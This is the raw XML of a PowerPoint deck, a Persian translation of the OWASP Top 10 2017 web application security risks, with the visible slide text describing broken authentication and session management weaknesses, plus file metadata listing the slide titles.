                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>قابل کشف بودن</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR"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۲</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fa-IR" sz="1050" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>تکنیکی</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="12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۳</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gn="just" rtl="1"/>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>مهاجمان به صدها میلیون نام کاربری و  رمز عبور معتبر جهت ارائه تشخیص هویت، </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>به عنوان</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>لیست حساب</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>‌</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>های مدیریتی پیش فرض، حمله جامع خودکار و ابزارهای حمله دیکشنری</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> دسترسی دارند</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>. حملات مدیریت </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>نشست</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> به خوبی درک می شود، به خصوص در رابطه با توکن های نشست غیرقابل انتظار.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>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just" rtl="1"/>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>رواج </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>این</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> حمله </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>به علت </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>نحوه </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>طراحی و پیاده سازی بیشتر </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>احراز</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>هویت</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>‌ها</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> و کنترل دسترسی </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>بسیار </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>گسترده است. مدیریت </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>نشست،</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> پایه</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>‌ی</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>احراز هویت و کنترل دسترسی است و در همه برنامه های </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>stateful</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> وجود دارد.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just" rtl="1"/>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>مهاجمان می توانند شکست احراز هویت را با استفاده از راهکار دستی تشخیص دهند و با استفاده از ابزارهای خودکار با لیستی از پسوردها و حمله های دیکشنری از آنها سو استفاده کنند. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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just" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>مهاجم تنها می تواند به چند تا از حساب های  محدود دسترسی پیدا کند، یا تنها می تواند به حساب مدیر برای به خطر انداختن سیستم دسترسی پیدا کند. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>بسته به حوزه کاربرد، این ممکن است</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1050" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> منجر </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>به پولشویی، کلاهبرداری اجتماعی و سرقت هویت یا اطلاعات محرمانه محافظت</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>شده از نظر قانونی را افشا کند</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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B0185D42C1B6140B494AB4B0EA4177D" ma:contentTypeVersion="2" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="f58c47afdd71951313c9339f79afa2b8">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="3111e934-d037-480f-8afb-4b8641a4d3d0" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="6722d99a104aa1dc014ea54cbc90ba49" ns2:_="">
    <xsd:import namespace="3111e934-d037-480f-8afb-4b8641a4d3d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11e934-d037-480f-8afb-4b8641a4d3d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934DEA-268C-4DC1-8750-E4CCBD4B97B2}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/terms/"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1/"/>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"/>
    <ds:schemaRef ds:uri="3111e934-d037-480f-8afb-4b8641a4d3d0"/>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4FAB653D-CFEC-40CB-A9D5-DBAB2CF1BC6C}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{E6C9AF13-6A7D-406D-B045-B45C3FC985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11e934-d037-480f-8afb-4b8641a4d3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3743</TotalTime>
  <Words>16457</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>A4 Paper (210x297 mm)</PresentationFormat>
  <Paragraphs>1330</Paragraphs>
  <Slides>25</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 Nazanin</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Exo 2</vt:lpstr>
      <vt:lpstr>Liberation Sans</vt:lpstr>
      <vt:lpstr>OpenSymbol</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr> فهرست مطالب</vt:lpstr>
      <vt:lpstr>پیش گفتار</vt:lpstr>
      <vt:lpstr>معرفی</vt:lpstr>
      <vt:lpstr>توجهات این نسخه</vt:lpstr>
      <vt:lpstr>مخاطرات امنیتی برنامه‌های کاربردی</vt:lpstr>
      <vt:lpstr>OWASP Top 10 خطرهای امنیتی برنامه کاربردی– 2017 </vt:lpstr>
      <vt:lpstr>تزریق</vt:lpstr>
      <vt:lpstr>احراز هویت ناقص</vt:lpstr>
      <vt:lpstr>افشای اطلاعات حساس</vt:lpstr>
      <vt:lpstr>XML External Entities (XXE)</vt:lpstr>
      <vt:lpstr>کنترل دسترسی ناقص</vt:lpstr>
      <vt:lpstr>پیکربندی اشتباه امنیتی</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>نا امن Deserialization</vt:lpstr>
      <vt:lpstr>استفاده از مولفه‌های با آسیب‌پذیری شناخته شده</vt:lpstr>
      <vt:lpstr>نظارت و ثبت سیاهه ناکافی</vt:lpstr>
      <vt:lpstr>گام بعدی برای توسعه‌دهندگان</vt:lpstr>
      <vt:lpstr>گام بعدی برای آزمونگران امنیت</vt:lpstr>
      <vt:lpstr>گام بعدی برای مدیران برنامه ها</vt:lpstr>
      <vt:lpstr>گام بعدی برای مدیران برنامه ها</vt:lpstr>
      <vt:lpstr>یادداشتی در مورد ریسک ها</vt:lpstr>
      <vt:lpstr>جزئیاتی در مورد فاکتورهای ریسک</vt:lpstr>
      <vt:lpstr>روش و داده </vt:lpstr>
      <vt:lpstr>تشکر و قدردانی</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>OWASP</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kv</cp:lastModifiedBy>
  <cp:revision>2555</cp:revision>
  <cp:lastPrinted>2017-11-16T20:35:31Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-08-17T12:51:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-15T12:09:54Z</dcterms:modified>
  <cp:contentStatus>RC2_RCC1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0x0101004B0185D42C1B6140B494AB4B0EA4177D</vt:lpwstr>
  </property>
</Properties>
</file>